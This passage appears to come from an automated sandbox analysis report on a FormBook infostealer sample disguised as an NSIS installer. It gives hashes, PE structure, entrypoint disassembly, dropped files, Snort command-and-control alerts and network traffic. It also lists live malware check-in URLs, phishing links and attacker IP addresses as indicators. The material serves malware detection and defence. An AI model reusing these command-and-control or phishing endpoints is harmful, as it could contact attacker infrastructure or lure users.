	Arabian Aluminium Products Co. L.L.C-pdf-.exe	Get hash	malicious	FormBook	Browse	www.ecorpay.biz/a09e/?4h8Pe=v0DpmlQHSdUdP6np&fFNH=97+dnwivbWuZbj6KXr7rP2QwDSSem1HbuJduwDlJK44J3UStfHHGUmLN/DDpGJPNO8cw
	PO 700125-pdf-.exe	Get hash	malicious	FormBook	Browse	www.ecorpay.biz/a09e/?z8nxQx=97+dnwivbWuZbj6KXr7rP2QwDSSem1HbuJduwDlJK44J3UStfHHGUmLN/Aj5Jof1QZ13&lVnDHL=CpNlV2B8kD1P-t
	VCgLc3XXth.exe	Get hash	malicious	FormBook	Browse	www.hr-energys.com/tc10/?Z4=JHTmh3EWKTPKf1cHLPJvR2ZFoVNC9AR7o7RzP26IdifzzOhK0sieS8LaPvWkJY6zfCOxZ5wHpw==&UZWh=5jfLYpLX3XFpgtE
	LANXESS India Private Limited-pdf-scan-copy.exe	Get hash	malicious	FormBook	Browse	www.ecorpay.biz/a09e/?5j28vRex=97+dnwivbWuZbj6KXr7rP2QwDSSem1HbuJduwDlJK44J3UStfHHGUmLN/Aj5Jof1QZ13&b2=bRbDkTNp5ZeX
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.bestshedstobuy.com/my24/?VlWD=+J//Ny9ZhLFW2AjEdvcSUPlox6uw5eu3qrMWbYLHwLIGOJmoe0z5z197zCtVZDfyHS8b&3ff=L2MtR2j8RXGxlFx
	SecuriteInfo.com.Variant.Jaik.110210.1452.31617.exe	Get hash	malicious	FormBook	Browse	www.infotech.wiki/w14d/?c2Mhmv8=dl1tlOpb+xogHJBPJW+gVBSyFLzCo7G091N/hBKFN5v+H4cuYwRfI9nBHU5MN+t+4Xb8&k2Mx=6ll4iRq0VPkL_V
	OUTSTANDING PI770100059 SOA OCT 2022.IMG	Get hash	malicious	FormBook, GuLoader	Browse	www.vnsuda.lol/gkr4/?pVvPi=jRwH&9rW=i9EYUB6T86BTY8cTtp+oqcAuy+2swFSPHzn9C0Z+4aDcJRNIbQa89iKj2Vm4IUHpJGzLXK064b2B1kQWf+fbpqzjbVwvy3ABTg==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ssl1.prod.systemdragon.com	IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Get hash	malicious	FormBook	Browse	104.17.157.1
	wLlREXsA9M.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.157.1
	sOjxIU25DP.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.157.1
	hi38VYWujz.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.158.1
	Payment_document.docx.doc	Get hash	malicious	FormBook	Browse	104.17.158.1
	E-dekont_pdf.exe	Get hash	malicious	FormBook	Browse	104.17.157.1
	E-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.17.158.1
	PO_3534272.exe	Get hash	malicious	FormBook	Browse	104.17.157.1
td-ccm-neg-87-45.wixdns.net	PO_876-1057.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	RFQ_GEC18.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.149.87.45
	SecuriteInfo.com.Variant.Jaik.195228.28080.29351.exe	Get hash	malicious	FormBook, NSISDropper	Browse	34.149.87.45
	vcQaXrBHRi.exe	Get hash	malicious	FormBook, NSISDropper	Browse	34.149.87.45
	RMW-2422.xls	Get hash	malicious	FormBook, NSISDropper	Browse	34.149.87.45
	XHK098909PO00.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	http://www.thewhiteorchidspa.com	Get hash	malicious	Unknown	Browse	34.149.87.45
	Tjn6ml70u4.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	SecuriteInfo.com.Trojan.Inject4.59820.201.31258.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	RFQ_GEC-14.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.149.87.45
	30102023_678096234678909750.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	FedEx_AWB#817443848264.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	27102023_267897635409878.exe	Get hash	malicious	FormBook	Browse	34.149.87.45
	Purchase_Order_1021234.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.149.87.45
	A0719_016_9900_F5_001_D_A_1M_230714.pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	34.149.87.45
	https://www.assetmapping.events/	Get hash	malicious	HTMLPhisher	Browse	34.149.87.45
	https://www.assetmapping.events/gis-local-govt-asset-mgmt	Get hash	malicious	HTMLPhisher	Browse	34.149.87.45
	http://www.sharepoint-dahler.de/	Get hash	malicious	Unknown	Browse	34.149.87.45
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.9855.30076.rtf	Get hash	malicious	FormBook	Browse	34.149.87.45
	obizx.exe	Get hash	malicious	FormBook	Browse	34.149.87.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PEGTECHINCUS	DOCUMENTOS_FINALES_PARA_ENV#U00cdOS_pdf.exe	Get hash	malicious	FormBook	Browse	108.186.24.219
	2jNbOCyBG1.exe	Get hash	malicious	Unknown	Browse	137.175.17.172
	Documents.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	SecuriteInfo.com.Variant.Jaik.195228.28080.29351.exe	Get hash	malicious	FormBook, NSISDropper	Browse	107.148.223.82
	SecuriteInfo.com.Trojan.PackedNET.2512.24045.1012.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	Revised_invoice.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	proforma_invoice.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	SecuriteInfo.com.Trojan.Inject4.59820.22477.20906.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	Shipping_documents.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	876-1057.exe	Get hash	malicious	FormBook	Browse	107.149.182.214
	Purchase_Order_No.1364.exe	Get hash	malicious	FormBook	Browse	142.4.124.174
	SecuriteInfo.com.Win32.PWSX-gen.18902.20315.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	SecuriteInfo.com.Trojan.Inject4.59820.201.31258.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	Purchase_Order_No.1364.exe	Get hash	malicious	FormBook	Browse	142.4.124.174
	SecuriteInfo.com.Win32.PWSX-gen.31302.3536.exe	Get hash	malicious	FormBook	Browse	107.148.95.217
	z0r0.i686.elf	Get hash	malicious	Mirai	Browse	156.243.156.244
	sora.mips.elf	Get hash	malicious	Mirai	Browse	156.243.156.240
	1.elf	Get hash	malicious	XorDDoS	Browse	142.0.138.41
	#U00f6deme_talimat#U0131.exe	Get hash	malicious	FormBook	Browse	142.4.119.230
	b3astmode.arm.elf	Get hash	malicious	Mirai	Browse	154.84.242.243
AMAZON-02US	http://communitycampus.online	Get hash	malicious	Unknown	Browse	13.225.214.113
	1054696.xlsm	Get hash	malicious	Unknown	Browse	18.154.227.100
	SWIFT_COPY_HSBC_BANK-97475.exe	Get hash	malicious	FormBook, NSISDropper	Browse	13.251.234.246
	SWIFT_COPY_HSBC_BANK-97472.exe	Get hash	malicious	FormBook, NSISDropper	Browse	13.251.234.246
	bRio.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	52.52.52.213
	JtRzcZTu3S.elf	Get hash	malicious	Mirai	Browse	3.177.104.12
	arm7.elf	Get hash	malicious	Mirai	Browse	18.191.144.102
	x86.elf	Get hash	malicious	Unknown	Browse	3.30.104.229
	mips.elf	Get hash	malicious	Unknown	Browse	52.88.208.112
	mpsl.elf	Get hash	malicious	Unknown	Browse	13.222.143.185
	bRhZ.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	13.52.90.244
	bRhY.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	54.219.247.190
	http://uropygial-daughters.000webhostapp.com/	Get hash	malicious	Unknown	Browse	99.84.191.41
	https://censorial-thyristor.000webhostapp.com/	Get hash	malicious	Unknown	Browse	99.84.191.77
	https://mannedroll.com/0/0/0/fce32451eb1dc7beb0219bbe608d4403/0/43811/184525/24	Get hash	malicious	Phisher	Browse	108.138.85.31
	http://az7technoloan.com/cl/0_mt/10/1603/3039/0/0	Get hash	malicious	Phisher	Browse	54.171.111.121
	bRhS.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	52.8.11.142
	https://zvahgbnsgv.chilhillswe.ru/flzjdl/#bGlhbmRhLnN0b2VsQG1sY2luc3VyYW5jZS5jb20uYXU=	Get hash	malicious	Unknown	Browse	3.162.103.64
	https://us.docs.wps.com/module/common/loadPlatform/?sa=16&st=0t&sid=sICb8ypVCkJ3kqQY&v=v2	Get hash	malicious	Unknown	Browse	3.162.125.67
	HR_ Payout list for next Cored.eml	Get hash	malicious	HTMLPhisher	Browse	52.92.36.65

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\xheuzyg.exe	New_order_98987006305#.doc	Get hash	malicious	FormBook, NSISDropper	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\LocalState\DiagOutputDir\SkypeApp0.txt

Download File

Process:	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2340
Entropy (8bit):	5.157154166881333
Encrypted:	false
SSDEEP:	48:RJlU9Wt/hZm1hZo5hZCghHhmqvv8zqURAQ7UDXX+yciW6l6:RJlU9Wt/i1M5+ghHhmmv8zqURl0m
MD5:	D422204526D12E81FCF5B83E198A8F71
SHA1:	D51EC39B0F2220F134671B704C13FD262928B803
SHA-256:	17544DFBED5E4811EBEB099BEC53D0BEC4ED8873D1F8398D7FA2ADFCAC6AECB9
SHA-512:	E027626FA3A68E8AB1DF6F2D77A8A5F687297F2A580E1723A34A517E8C46AEDC60C844D3676010D225B2954B8BA9A1E7723CB334A02399D1D2F30028C8C85B89
Malicious:	false
Reputation:	low
Preview:	2023-11-03 14:33:09.725+01:00 [3840:002] [Info] [RegularSkypeApplication] App constructor: process started. App version:14.53.77.0..2023-11-03 14:33:10.866+01:00 [3840:002] [Info] [RegularSkypeApplication] OnBackgroundActivated d214765b-d320-4e35-9c20-bc9e07f1fb5f..2023-11-03 14:33:11.100+01:00 [3840:002] [Info] [ExternalApi] Notifications enabled..2023-11-03 14:33:11.241+01:00 [3840:002] [Info] [RegularSkypeApplication] EnsureReactNativeHostStarted: no bytecode file present to delete..2023-11-03 14:33:11.288+01:00 [3840:002] [Info] [RegularSkypeApplication] EnsureReactNativeHostStarted: starting host..2023-11-03 14:33:11.304+01:00 [3840:002] [Info] [RNW] ReactInstanceManager: constructor..2023-11-03 14:33:11.366+01:00 [3840:002] [Info] [RegularSkypeApplication] EnsureReactNativeHostStarted: host started..2023-11-03 14:33:11.366+01:00 [3840:002] [Info] [RNW] ReactInstanceManager: TryGetReactContextAsync - entry..2023-11-03 14:33:11.366+01:00 [3840:002] [Info] [RNW] ReactInstanceManager

C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	245248
Entropy (8bit):	6.483524898429163
Encrypted:	false
SSDEEP:	6144:tRu/iIAZFP+1L72ohpG6oHqB8Bp6XQAOA5e:PuRAZFP+H06oHqB8Bp6Aae
MD5:	25D54D83B6D68CAF9DE7655FF5E33651
SHA1:	C5D7F7CF3E48743345E8F3BF67FE786E9A4B4FDA
SHA-256:	B5D248548FAEDE30D47AA97B068B3BD63D39EA0C69D965FEE54AD1ACCF51495B
SHA-512:	9DB3220C6AE5AE2EA92EFA979FF2B92C38CEEF0CE6FD93C64D670DDA8AD88A6E1DBAEC059BB25E1AC7FC3714A0DEFCFC014B955E687C39531842AA6A77C68586
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Joe Sandbox View:	Filename: New_order_98987006305#.doc, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$.N.J.N.J.N.J...I.C.J...O...J..I.Y.J..O.t.J..N.l.J...N.Y.J...K.W.J.N.K...J...C.O.J...H.O.J.RichN.J.........PE..L...\|!Ce.....................>....................@.......................................@.................................$.................................... ...l.......................l.......l..@...............X............................text...?........................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.tls................................@....reloc... ......."..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zpupnygx.udk

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
File Type:	data
Category:	dropped
Size (bytes):	209953
Entropy (8bit):	7.992988895917002
Encrypted:	true
SSDEEP:	6144:N4ic9mhPFciEJh7L1o+NTHvqmMXX2daCDl:Nc9mhPGh7LRRomE2
MD5:	4F96456988AC17FE0F73C36FC52A2ABF
SHA1:	20A30FB41B445CD358F05BA6F69980F2EC56F020
SHA-256:	3FFE9B918720B5745D8967022BDE16F154330A32505958CA57E1B87332ADE644
SHA-512:	FFD6EC0E48D3D09D784BE41CB7553AFD88758ACD3DD88879B4B9BE969C85114CB1F340A29113EF4E6C922E58D7EC510C36EF4E5B5CC08195437475B90FD52778
Malicious:	false
Preview:	G...X=.......hF.XG.}.OR..\|..7.(....W.b.9...w.Y`.V...T..p.p.M..=...}....Z[.9..y.%v^I......$......\.@.jvU........Ym!...L...@.]......(r..C`..8..$.I.x.h...J.v....{U).?...7.=A@...\^1`...H`..n.r.....ei...Mx?..E.{W.....$.G.,{B.\.r+.)[.....Z."ZR.{.h...=..+.;..-./...:}%......M....<.W.b....w.Y`.VO..T..p.p.M.K..{....[d.O..>.t..yO.~.E0L..2gT...ay.2n.Ob.`.w.....Ym!....A....G............N-..~...Yv.h.........4.0.?...7.=...<.\^1..m.h.g........ei.....g.\|..........$.G.<.B..r+C.[..L...."Z..{hh...=.....-./.S.:?%.....IM.(....W.b.9...w.Y`.V...T..p.p.M.K..{....[d.O..>.t..yO.~.E0L..2gT...ay.2n.Ob.`.w.....Ym!....A....G............N-..~...Yv.h.........4.0.?...7.=A@...\^1:g..m.h.gz.......ei.....g.\|.E..W.....$.G.<.B.*.r+C.[..L...."Z..{hh...=.....-./.S.:?%.....IM.(....W.b.9...w.Y`.V...T..p.p.M.K..{....[d.O..>.t..yO.~.E0L..2gT...ay.2n.Ob.`.w.....Ym!....A....G............N-..~...Yv.h.........4.0.?...7.=A@...\^1:g..m.h.gz.......ei.....g.\|.E..W.....$.G

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.871248613955604
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.FileRepMalware.16340.31219.exe
File size:	420'368 bytes
MD5:	0c57a7aae080fd2eac42a31fa5b7f051
SHA1:	2e181788e6dec9e170556e2daa39a61dc2bf8b89
SHA256:	87770248637ba53e2fd2c65ec24b95659d9b1f2d3af87234601fd720f81d6fd8
SHA512:	c6dfd4c62ce0411aeb882020999f6ef967ea9cb1ed1832a568417a05f7e87a7c3e255ec911af0acb9704b597d1a41d4125e8893c08f8d6e31441ff017f3cb784
SSDEEP:	12288:urCOfcbuDZzf0/vJomoJNmBPQBZo+j34j:UCociJwB7AKj
TLSH:	4394231F5AC0C877C19207F50DB6EA76A7798D05A5D06A87CBEC3F73B821786C2062E5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

File Icon


Icon Hash:	0e3b1b1b194c3331

Static PE Info

General

Entrypoint:	0x40312a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b76363e9cb88bf9390860da8e50999d2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007FB378C01B03h
push ebx
call 00007FB378C048E4h
cmp eax, ebx
je 00007FB378C01AF9h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007FB378C04860h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FB378C01ADDh
push 0000000Dh
call 00007FB378C048B8h
push 0000000Bh
call 00007FB378C048B1h
mov dword ptr [0042EC24h], eax
call dword ptr [00407038h]
push ebx
call dword ptr [0040726Ch]
mov dword ptr [0042ECD8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429058h
call dword ptr [0040715Ch]
push 0040915Ch
push 0042E420h
call 00007FB378C044E4h
call dword ptr [0040710Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007FB378C044D2h
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7524	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0xced8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x27c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	False	0.6705729166666666	data	6.440655734359132	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x12a2	0x1400	False	0.4455078125	data	5.058328787102383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25d18	0x600	False	0.458984375	data	4.18773476617059	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2f000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x37000	0xced8	0xd000	False	0.7914287860576923	data	6.895564080355567	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x372b0	0x6eff	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9880344888263242
RT_ICON	0x3e1b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.5105809128630705
RT_ICON	0x40758	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.5792682926829268
RT_ICON	0x41800	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.5951492537313433
RT_ICON	0x426a8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.7179602888086642
RT_ICON	0x42f50	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.7174855491329479
RT_ICON	0x434b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.75177304964539
RT_DIALOG	0x43920	0x100	data	English	United States	0.5234375
RT_DIALOG	0x43a20	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x43b40	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x43ba0	0x68	data	English	United States	0.6826923076923077
RT_MANIFEST	0x43c08	0x2cc	XML 1.0 document, ASCII text, with very long lines (716), with no line terminators	English	United States	0.5656424581005587

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll	SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.73.33.130.19049727802031412 11/03/23-12:38:11.760375	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49727	80	192.168.2.7	3.33.130.190
192.168.2.7108.186.24.17549717802031412 11/03/23-12:36:49.663320	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49717	80	192.168.2.7	108.186.24.175
192.168.2.734.149.87.4549729802031412 11/03/23-12:38:32.172304	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49729	80	192.168.2.7	34.149.87.45
192.168.2.7104.17.158.149716802031412 11/03/23-12:36:28.890688	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49716	80	192.168.2.7	104.17.158.1
192.168.2.7103.224.212.21649719802031412 11/03/23-12:37:30.104632	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49719	80	192.168.2.7	103.224.212.216
192.168.2.775.2.115.19649718802031412 11/03/23-12:37:09.512099	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49718	80	192.168.2.7	75.2.115.196

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2023 12:35:07.389504910 CET	49710	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:35:08.395555973 CET	49710	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:35:10.395509005 CET	49710	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:35:14.395534039 CET	49710	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:35:22.395524025 CET	49710	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:35:29.752605915 CET	49712	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:35:30.739383936 CET	49712	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:35:30.822355032 CET	49715	80	192.168.2.7	154.17.26.8
Nov 3, 2023 12:35:30.980528116 CET	80	49715	154.17.26.8	192.168.2.7
Nov 3, 2023 12:35:31.489296913 CET	49715	80	192.168.2.7	154.17.26.8
Nov 3, 2023 12:35:31.646733999 CET	80	49715	154.17.26.8	192.168.2.7
Nov 3, 2023 12:35:32.161175966 CET	49715	80	192.168.2.7	154.17.26.8
Nov 3, 2023 12:35:32.318820953 CET	80	49715	154.17.26.8	192.168.2.7
Nov 3, 2023 12:35:32.739305973 CET	49712	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:35:32.833058119 CET	49715	80	192.168.2.7	154.17.26.8
Nov 3, 2023 12:35:32.990966082 CET	80	49715	154.17.26.8	192.168.2.7
Nov 3, 2023 12:35:33.505008936 CET	49715	80	192.168.2.7	154.17.26.8
Nov 3, 2023 12:35:33.662457943 CET	80	49715	154.17.26.8	192.168.2.7
Nov 3, 2023 12:35:36.740926981 CET	49712	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:35:44.739339113 CET	49712	80	192.168.2.7	198.177.124.40
Nov 3, 2023 12:36:28.798491001 CET	49716	80	192.168.2.7	104.17.158.1
Nov 3, 2023 12:36:28.890494108 CET	80	49716	104.17.158.1	192.168.2.7
Nov 3, 2023 12:36:28.890592098 CET	49716	80	192.168.2.7	104.17.158.1
Nov 3, 2023 12:36:28.890687943 CET	49716	80	192.168.2.7	104.17.158.1
Nov 3, 2023 12:36:28.982506037 CET	80	49716	104.17.158.1	192.168.2.7
Nov 3, 2023 12:36:28.985057116 CET	80	49716	104.17.158.1	192.168.2.7
Nov 3, 2023 12:36:28.985295057 CET	49716	80	192.168.2.7	104.17.158.1
Nov 3, 2023 12:36:28.985434055 CET	80	49716	104.17.158.1	192.168.2.7
Nov 3, 2023 12:36:28.985497952 CET	49716	80	192.168.2.7	104.17.158.1
Nov 3, 2023 12:36:29.077470064 CET	80	49716	104.17.158.1	192.168.2.7
Nov 3, 2023 12:36:49.491466045 CET	49717	80	192.168.2.7	108.186.24.175
Nov 3, 2023 12:36:49.662949085 CET	80	49717	108.186.24.175	192.168.2.7
Nov 3, 2023 12:36:49.663186073 CET	49717	80	192.168.2.7	108.186.24.175
Nov 3, 2023 12:36:49.663320065 CET	49717	80	192.168.2.7	108.186.24.175
Nov 3, 2023 12:36:49.836610079 CET	80	49717	108.186.24.175	192.168.2.7
Nov 3, 2023 12:36:49.836668968 CET	80	49717	108.186.24.175	192.168.2.7
Nov 3, 2023 12:36:49.837048054 CET	49717	80	192.168.2.7	108.186.24.175
Nov 3, 2023 12:36:49.837048054 CET	49717	80	192.168.2.7	108.186.24.175
Nov 3, 2023 12:36:50.008388996 CET	80	49717	108.186.24.175	192.168.2.7
Nov 3, 2023 12:37:09.419681072 CET	49718	80	192.168.2.7	75.2.115.196
Nov 3, 2023 12:37:09.511653900 CET	80	49718	75.2.115.196	192.168.2.7
Nov 3, 2023 12:37:09.511838913 CET	49718	80	192.168.2.7	75.2.115.196
Nov 3, 2023 12:37:09.512099028 CET	49718	80	192.168.2.7	75.2.115.196
Nov 3, 2023 12:37:09.604214907 CET	80	49718	75.2.115.196	192.168.2.7
Nov 3, 2023 12:37:09.932372093 CET	80	49718	75.2.115.196	192.168.2.7
